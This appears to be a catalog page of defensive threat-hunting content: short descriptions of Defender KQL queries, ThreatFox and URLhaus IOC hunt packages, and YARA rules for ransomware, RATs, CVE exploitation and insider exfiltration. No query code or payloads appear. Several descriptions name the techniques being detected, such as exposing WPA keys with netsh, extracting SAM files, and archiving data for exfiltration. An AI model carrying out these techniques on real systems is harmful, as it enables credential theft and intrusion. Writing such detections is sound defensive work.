Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries
kql medium
DeviceLogonEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (7)
kql medium
DeviceFileEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (8)
kql medium
DeviceProcessEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (9)
kql medium
DeviceNetworkEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
jar-attachments
kql medium
EmailAttachmentInfoEmailEvents
This query was originally published in the threat analytics report, Adwind utilizes Java for cross-platform impact. Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capa
localAdminAccountLogon
kql medium
DeviceLogonEvents
This query looks for local admin account used to logon into the computer. This can help to detect malicious insiders that were able to add a local account to the local admin group offline.
LocalAdminGroupChanges
kql medium
DeviceEventsIdentityInfo
Author: alex verboon @alexverboon. Blogpost: https://www.verboon.info/2020/09/hunting-for-local-group-membership-changes.
Multiple Entra ID Admin Removals
kql medium
CloudAppEvents
Looks for multiple users that had their admin role removed by a single user within a certain period.
Network Logons with Local Accounts
kql medium
DeviceLogonEvents
This query looks for a large number of network-based authentications using local credentials coming from a single source IP address. High counts of logons involving a large number of distinct machines
NewAppOrServicePrincipalCredential[Nobelium]
kql medium
CloudAppEvents
This query will find when a new credential is added to an application or service principal. The Nobelium activity group was able to gain sufficient access to add credentials to existing applications w
Non_intended_user_logon
kql medium
DeviceLogonEventsIdentityInfo
Under some circumstances it is only allowed that users from country X logon to devices from country X. This query finds logon from users from other countries than X. The query requires a property to i
Non-local logons with -500 account
kql medium
DeviceLogonEventsIdentityLogonEvents
Non-local logons with the built-in administrator (-500) account.
PhishingEmailUrlRedirector
kql medium
EmailUrlInfo
This query was originally published on Twitter, by @MsftSecIntel. The query helps detect emails associated with a campaign that has used open redirector URLs. The campaign's URLs begin with the distin
qakbot-campaign-registry-edit
kql medium
DeviceRegistryEvents
This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware Qakbot is malware that steals login credentials from banking and financial services. It has
ransom-note-creation-macos
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is
Rare-process-as-a-service
kql medium
T1543T1543.003
DeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEvents
This query is looking for rarely seen processes which are launched as a service. Author: Jouni Mikkola More info: https://threathunt.blog/rare-process-launch-as-a-service/
rare_sch_task_with_activity
kql medium
T1053
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceLogonEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents
Looks for rare process launch as a scheduled task and activity done by the processes. Author: Jouni Mikkola More info: https://threathunt.blog/hunting-for-malicious-scheduled-tasks/
remote-file-creation-with-psexec
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread
Risky Sign-in with Device Registration
kql medium
CloudAppEvents
Looks for a new device registration in Entra ID preceded by medium or high-risk sign-in session for the same user within maximum 6h timeframe.
ServiceAccountsPerformingRemotePS
kql medium
DeviceEventsDeviceLogonEvents
Service Accounts Performing Remote PowerShell. Author: miflower. The purpose behind this detection is for finding service accounts that are performing remote powershell sessions. There are two phases
SuspiciousUrlClicked
kql medium
AlertEvidenceDeviceEventsEmailEventsIdentityInfo
This query correlates Microsoft Defender for Office 365 signals and Microsoft Entra ID identity data to find the relevant endpoint event BrowerLaunchedToOpen in Microsoft Defender ATP. This event refl
ThreatFox: Antidot IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 68 IOCs associated with Antidot
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Kimwolf
ThreatFox: Dofloo IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 5 IOCs associated with Dofloo
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
The Mirai malware compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 7 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 4 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 35 IOCs associated with ClearFake
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 11 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 12 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Cobalt Strike
ThreatFox: DarkComet IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DarkComet is a remote access Trojan (RAT) that enables attackers to exfiltrate data, execute commands, and
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Quasar RAT is a remote access trojan that enables adversaries to execute commands, exfiltrate data, and maintain persistence on infected systems. It typically
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 22 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Remus
ThreatFox: Satacom IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 5 IOCs associated with Satacom
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SectopRAT
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: ValleyRAT IOCs
ioc-hunt high
DnsEvents
ValleyRAT is a Remote Access Trojan designed to exfiltrate data and provide adversaries
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware designed to steal credentials and sensitive information from infected systems, often leveraging encrypted communication channels to avoid detection. It typically arrives via phishing emails containing malicious attachments or links to compromised domains and URLs, which deploy the malware through exploit kits or credential stealer
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with VShell
turn-off-system-restore
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
Unusual volume of file deletion by user.
kql medium
CloudAppEvents
This query looks for users performing file deletion activities. Spikes in file deletion observed from risky sign-in sessions are flagged here. This applies to SharePoint and OneDrive users. Audit even
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 49 malicious URLs tagged as 32-bit
URLhaus: apk Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
This malware family is designed to exfiltrate sensitive data and execute arbitrary code on infected Android devices
URLhaus: botnet Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The botnet malware is designed to establish persistent command-and-control (C2) communication, enabling remote control, data ex
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as Mozi
URLhaus: opendir Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as opendir
URLhaus: wraith Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as wraith
User navigation to redirected URL
kql medium
T1566.002
DeviceEvents
This query identifies when a user clicks a link that opens a browser to navigate to a URL which uses redirection. It then filters out any redirections to URLs in the same DNS namespace as the originat
wadhrama-data-destruction
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul
wifikeys
kql medium
DeviceProcessEvents
Detect if someone run netsh and try to expose WPA keys in clear text @mattiasborg82. Blog.sec-labs.com.
Alert Events from Internal IP Address
kql medium
AlertEvidence
Determines DeviceId from internal IP address and outputs all alerts in events table associated to the DeviceId. Example use case is Firewall determines Internal IP with suspicious network activity. Qu
AppLocker Policy Design Assistant
kql medium
DeviceProcessEvents
One of the challenges in making an AppLocker policy is knowing where applications launch from. This query normalizes process launch paths through aliasing, then counts the number of processes launche
Baseline Comparison
kql medium
AlertEvidenceDeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceLogonEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents
Baseline Comparison. Author: miflower. The purpose of this query is to perform a comparison between "known good" machines and suspected bad machines. The original concept for this query was born due t
Crashing Applications
kql medium
DeviceProcessEvents
This query identifies crashing processes based on parameters passed to werfault.exe and attempts to find the associated process launch from DeviceProcessEvents.
Detect Azure RemoteIP
kql medium
DeviceNetworkEvents
This query is a function that consumes the publicly available Azure IP address list and checks a list of remote IP addresses against it to see if they are Azure IP addresses or not. To use this, repla
Device Count by DNS Suffix
kql medium
This query will count the number of devices in Defender ATP based on their DNS suffix. For a full list of devices with the DNS suffix, comment out or remove the last line.
Device uptime calculation
kql medium
This query calculates device uptime based on periodic DeviceInfo which is recorded every 15 minutes regardless of device's network connectivity and uploaded once device gets online. If its interval is
EmojiHunt
kql medium
DeviceProcessEvents
Did you know you can use Emojis in Windows?. Read more here: https://davidzych.com/abusing-emoji-in-windows. Check-out who in your organization has renamed his or her computer to a Pizza or to a smili
Endpoint Agent Health Status Report
kql medium
This query will provide a report of many of the best practice configurations for Defender ATP deployment. Special Thanks to Gilad Mittelman for the initial inspiration and concept. Any tests which are
Events surrounding alert (1)
kql medium
AlertEvidenceDeviceLogonEvents
This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event
Events surrounding alert (2)
kql medium
DeviceLogonEvents
This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event
Events surrounding alert (3)
kql medium
AlertEvidenceDeviceLogonEvents
This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event
Events surrounding alert
kql medium
DeviceLogonEvents
This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event
Failed Logon Attempt
kql medium
DeviceLogonEvents
Sample query to detect If there are more then 3 failed logon authentications on high value assets. Update DeviceName to reflect your high value assets. For questions @MiladMSFT on Twitter or milad.asl
File footprint (1)
kql medium
DeviceNetworkEvents
Query #1 - Find the machines on which this file was seen. TODO - set file hash to be a SHA1 hash of your choice...
File footprint
kql medium
DeviceEventsDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEventsDeviceRegistryEvents
Query #1 - Find the machines on which this file was seen. TODO - set file hash to be a SHA1 hash of your choice...
Firewall Policy Design Assistant
kql medium
DeviceNetworkEvents
This query helps you design client firewall rules based on data stored within DeviceNetworkEvents. Folder paths are alias'ed to help represent the files making or receiving network connections without
insider-threat-detection-queries (1)
kql medium
DeviceFileEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (10)
kql medium
EmailEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (11)
kql medium
DeviceNetworkEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
Linux Agent Age Report
kql medium
This query uses the public MDE GitHub repo as a source to estimate the time that an agent build remains supported based on the time it was uploaded. Please note that the timestamps used in this query
Machine info from IP address (1)
kql medium
The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What
Machine info from IP address (2)
kql medium
The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What
Machine info from IP address (3)
kql medium
The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What
Machine info from IP address
kql medium
The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What
Make FolderPath Vogon Poetry
kql medium
DeviceProcessEvents
This is a completely stupid and pointless query that makes Vogon poetry out of a random FolderPath from the table you pass it. You can change DeviceProcessEvents for any table as long as it has a col
MD AV Signature and Platform Version
kql medium
This query will identify the Microsoft Defender Antivirus Engine version and Microsoft Defender Antivirus Security Intelligence version (and timestamp), Product update version (aka Platform Update ver
MITRE - Suspicious Events
kql medium
DeviceProcessEvents
Description:. The query looks for several different MITRE techniques, grouped by risk level. A weighting is applied to each risk level and a total score calculated per machine. Techniques can be added
Network footprint (1)
kql medium
DeviceNetworkEvents
Query 1 shows you any network communication happened from endpoints to a specific Remote IP or Remote URL. Ensure to update RemoteIP and RemoteURL variable. For questions @MiladMSFT on Twitter or mila
Network footprint (2)
kql medium
DeviceEventsDeviceNetworkEvents
Query 1 shows you any network communication happened from endpoints to a specific Remote IP or Remote URL. Ensure to update RemoteIP and RemoteURL variable. For questions @MiladMSFT on Twitter or mila
Network footprint (3)
kql medium
DeviceFileEvents
Query 1 shows you any network communication happened from endpoints to a specific Remote IP or Remote URL. Ensure to update RemoteIP and RemoteURL variable. For questions @MiladMSFT on Twitter or mila
Network footprint
kql medium
DeviceNetworkEvents
Query 1 shows you any network communication happened from endpoints to a specific Remote IP or Remote URL. Ensure to update RemoteIP and RemoteURL variable. For questions @MiladMSFT on Twitter or mila
Network info of machine
kql medium
Get information about the netwotk adapters of the given computer in the given time. This could include the configured IP addresses, DHCP servers, DNS servers, and more.
EmailEvents
How much phish and malware emails vs good emails received the user in the given timeframe.
Services
kql medium
DeviceRegistryEvents
Gets the service name from the registry key.
System Guard Security Level Baseline
kql medium
DeviceEvents
Establishes a baseline SystemGuardSecurityLevel and show the devices that are below that baseline. See https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/How-insights-from-system-attestatio
System Guard Security Level Drop
kql medium
DeviceEvents
Goal: Find machines in the last N days where the SystemGuardSecurityLevel value NOW is less than it was BEFORE. Step 1: Get a list of all security levels in the system where the level is not null.
ThreatFox: Antidot IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 68 IOCs associated with Antidot
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 37 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 90 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 30 IOCs associated with Cobalt Strike
ThreatFox: DarkComet IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DarkComet
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Remus
ThreatFox: Satacom IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 5 IOCs associated with Satacom
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SectopRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with VShell
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as 32-bit
URLhaus: 54e64e Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 54e64e
URLhaus: adb Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as adb
URLhaus: amos Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as amos
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as arm
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as ClearFake
URLhaus: DDoSAgent Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as DDoSAgent
URLhaus: dropped-by-Phorpiex Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as dropped-by-Phorpiex
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 19 malicious URLs tagged as elf
URLhaus: loader Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as loader
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 25 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
Web Content Filtering Events
kql medium
DeviceEvents
This query identifies web content filtering events in Advanced Hunting.
winrar-cve-2018-20250-ace-files
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, WinRAR CVE-2018-20250 exploit WinRAR is a third-party file compressing application. Versions 5.61 and earlier contained a flaw that
winrar-cve-2018-20250-file-creation
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, WinRAR CVE-2018-20250 exploit WinRAR is a third-party file compressing application. Versions 5.61 and earlier contained a flaw that
7-zip-prep-for-exfiltration
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
AcroRd-Exploits
kql medium
DeviceFileEvents
The following query look for suspicious behaviors observed by the samples analyzed in the report.
T1562.001T1055
DeviceImageLoadEvents
Identifies native processes or binaries in writable paths loading .NET runtimes. This suggests in-memory code injection and ETW patching used by malware to execute code while evading detection by secu
CloudAppEvents
This query looks for anomalies in mail item access events made by Graph API. It uses standard deviation to determine if the number of events is anomalous. The query returns all clientIDs where the amo
Anthem Hack Deep Panda - htran-exe
yara low
Anthem Hack Deep Panda - htran-exe
Anthem Hack Deep Panda - lot1.tmp-pwdump
Anthem Hack Deep Panda - ScanLine sl-txt-packed
Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll
APT DeputyDog
yara low
YARA rule: APT_DeputyDog
APT DeputyDog Fexel
yara low
YARA rule: APT_DeputyDog_Fexel
APT Derusbi DeepPanda
yara low
YARA rule: APT_Derusbi_DeepPanda
APT Derusbi Gen
yara low
YARA rule: APT_Derusbi_Gen
Rule to detect Duqu 2.0 drivers
yara low
Rule to detect Duqu 2.0 drivers
Rule to detect Duqu 2.0 samples
yara low
The YARA rule 'apt_duqu2_loaders' detects Duqu 2.0 malware samples
apt nix elf derusbi
yara low
YARA rule: apt_nix_elf_derusbi
apt nix elf derusbi kernelModule
yara low
YARA rule: apt_nix_elf_derusbi_kernelModule
YARA rule: apt_nix_elf_Derusbi_Linux_SharedMemCreation
apt nix elf Derusbi Linux Strings
yara low
YARA rule: apt_nix_elf_Derusbi_Linux_Strings
apt win exe trojan derusbi
yara low
YARA rule: apt_win_exe_trojan_derusbi
YARA rule: apt_win32_dll_bergard_pgv_pvid_variant
Code Repo Exfiltration
kql medium
CloudAppEvents
Looks for accounts that uploaded multiple code repositories to external web domain.
CVE-2021-36934 usage detection
kql medium
DeviceProcessEvents
Assuming that you have a machine that is properly BitLocker'ed, then the machine will need to be running to extract the SAM and SYSTEM files. This first query looks for any access to the HKLM that hap
CVE-2022-22965 Network Activity
kql medium
DeviceNetworkEvents
The following query surface network activity associated with exploitation of CVE-2022-22965.
Data copied to other location than C drive
kql medium
DeviceFileEvents
Check all created files. That does not have extension ps1, bat or cmd to avoid IT Pro scripts. That are not copied to C:\ to detect all file share, external drive, data partition that are not allowed,
detect-archive-exfiltration-to-competitor
kql medium
DeviceFileEventsEmailAttachmentInfoEmailEvents
This query can be used to detect instances of a malicious insider creating a file archive and then emailing that archive to an external "competitor" organization.
detect-exfiltration-after-termination
kql medium
DeviceFileEventsDeviceNetworkEvents
This query can be used to explore any instances where a terminated individual (i.e. one who has an impending termination date but has not left the company) downloads a large number of files from a non
detect-steganography-exfiltration
kql medium
DeviceFileEventsDeviceNetworkEventsDeviceProcessEvents
This query can be used to detect instances of malicious users who attempt to create steganographic images and then immediately browse to a webmail URL. This query would require additional investigati
Identify service hollowing and persistence setting
File manipulation actions associated with CRASHOVERRIDE wiper
Registry Wiper functionality assoicated with CRASHOVERRIDE
Electron-CVE-2018-1000006
kql medium
DeviceProcessEvents
The query checks process command lines arguments and parent/child combinations to find machines where there have been. Attempts to exploit the Protocol Handler Vulnerability of Electron framework CVE-
exchange-powershell-snapin-loaded
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
Files copied to USB drives
kql medium
DeviceEventsDeviceFileEvents
This query lists files copied to USB external drives with USB drive information based on FileCreated events associated with most recent USBDriveMount events befor file creations. But be aware that Adv
Flash-CVE-2018-4848
kql medium
DeviceNetworkEvents
This query checks for specific processes and domain TLD used in the CVE-2018-4878 flash 0day exploit attack reported by KrCERT. CVE: CVE-2018-4878. Read more here:. Https://www.krcert.or.kr/data/secNo
T1098.003T1528
AuditLogs
Identifies application role assignments to service principals granting high-risk permissions such as Mail.ReadWrite, Directory.ReadWrite.All, or RoleManagement.ReadWrite.Directory, which provide tenan
Identify acting user for reported phish
kql medium
T1566
AlertEvidenceCloudAppEvents
Identifies the user who acted on a reported phishing message and compares that actor with the original recipient, helping investigate delegate or shared mailbox reporting scenarios.
Linux-DynoRoot-CVE-2018-1111
kql medium
DeviceProcessEvents
The query checks process command lines arguments and parent/child combinations to find machines where there have been. Attempts to exploit a DHCP remote code command injection CVE-2018-1111. DynoRoot
MailItemsAccessed Throttling [Nobelium]
kql medium
CloudAppEvents
The MailItemsAccessed action is part of the new Advanced Audit functionality of Microsoft Defender XDR. It's part of Exchange mailbox auditing and is enabled by default for users that have an Office 3
Map external devices
kql medium
DeviceEvents
Action "PnpDeviceConnected" reports the connection of any plug and play device. Read more online on event 6416: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-6416. Query
Map external devices (1)
kql medium
DeviceEvents
Action "PnpDeviceConnected" reports the connection of any plug and play device. Read more online on event 6416: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-6416. Query
MosaicLoader
kql medium
DeviceRegistryEvents
This hunting query looks Malware Hides Itself Among Windows Defender Exclusions to Evade Detection
CloudAppEvents
This query helps you review all OAuth applications accessing user mail via Graph. It could return a significant number of results depending on how many applications are deployed in the environment.
CloudAppEvents
As described in previous guidance, Nobelium may re-purpose legitimate existing OAuth Applications in the environment to their own ends. However, malicious activity patterns may be discernable from le
CloudAppEvents
Use this query to review OAuth applications whose behaviour has changed as compared to a prior baseline period. The following query returns OAuth Applications accessing user mail via Graph that did no
Password Protected Archive Creation
kql medium
DeviceProcessEvents
One common technique leveraged by attackers is using archiving applications to package up files for exfiltration. In many cases, these archives are usually protected with a password to make analysis m
Possible File Copy to USB Drive
kql medium
DeviceEventsDeviceFileEvents
This query searches for file copies which occur within a period of time (by default 15 min) to volumes other than the C drive or UNC shares. By default, this query will search all devices. A single de
DeviceNetworkEvents
First query digs in print spooler drivers folder for any file creations, MANY OF THE FILES THAT SHOULD COME UP HERE MAY BE LEGIT. Unsigned files or ones that don't have any relations to printers that
printnightmare-cve-2021-1675 usage detection
kql medium
DeviceFileEvents
First query digs in print spooler drivers folder for any file creations, MANY OF THE FILES THAT SHOULD COME UP HERE MAY BE LEGIT. Unsigned files or ones that don't have any relations to printers that
T1098.003
AuditLogs
Identifies permanent directory role assignments to privileged roles made outside the Privileged Identity Management activation workflow. Direct assignments bypass PIM approval and justification requir
Designed to catch loader observed used with ROKRAT malware
Designed to catch loader observed used with ROKRAT malware
T1098.001
AuditLogs
Identifies service principal credential additions or updates by actors with no history of this operation in the preceding 90 days. A new actor outside the established baseline may indicate credential
SolarWinds -CVE-2021-35211
kql medium
DeviceNetworkEvents
//Check for network connections with SolarWInds IP's based on DeviceNetworkEvents## Query
Spoolsv Spawning Rundll32
kql medium
DeviceProcessEvents
Look for the spoolsv.exe launching rundll32.exe with an empty command line
Suspicious DLLs in spool folder
kql medium
DeviceFileEventsDeviceImageLoadEvents
Look for the creation of suspicious DLL files spawned in the \spool\ folder along with DLLs that were recently loaded afterwards from \Old.
Suspicious files in spool folder
kql medium
DeviceFileEvents
Monitor for creation of suspicious files in the /spools/driver/ folder. This is a broad-based search that will surface any creation or modification of files in the folder targeted by this exploit. Fal
Suspicious Spoolsv Child Process
kql medium
DeviceImageLoadEventsDeviceProcessEvents
Surfaces suspicious spoolsv.exe behavior likely related to CVE-2021-1675
Suspicious Tomcat Confluence Process Launch
kql medium
T1203
DeviceProcessEvents
The query checks for suspicious Tomcat process launches associated with likely exploitation of Confluence - CVE-2022-26134 Read more here:. https://confluence.atlassian.com/doc/confluence-security-adv
ThreatFox: Antidot IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Antidot
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with Kimwolf
ThreatFox: Mozi IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mozi
ThreatFox: PerlBot IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with PerlBot
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 64 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
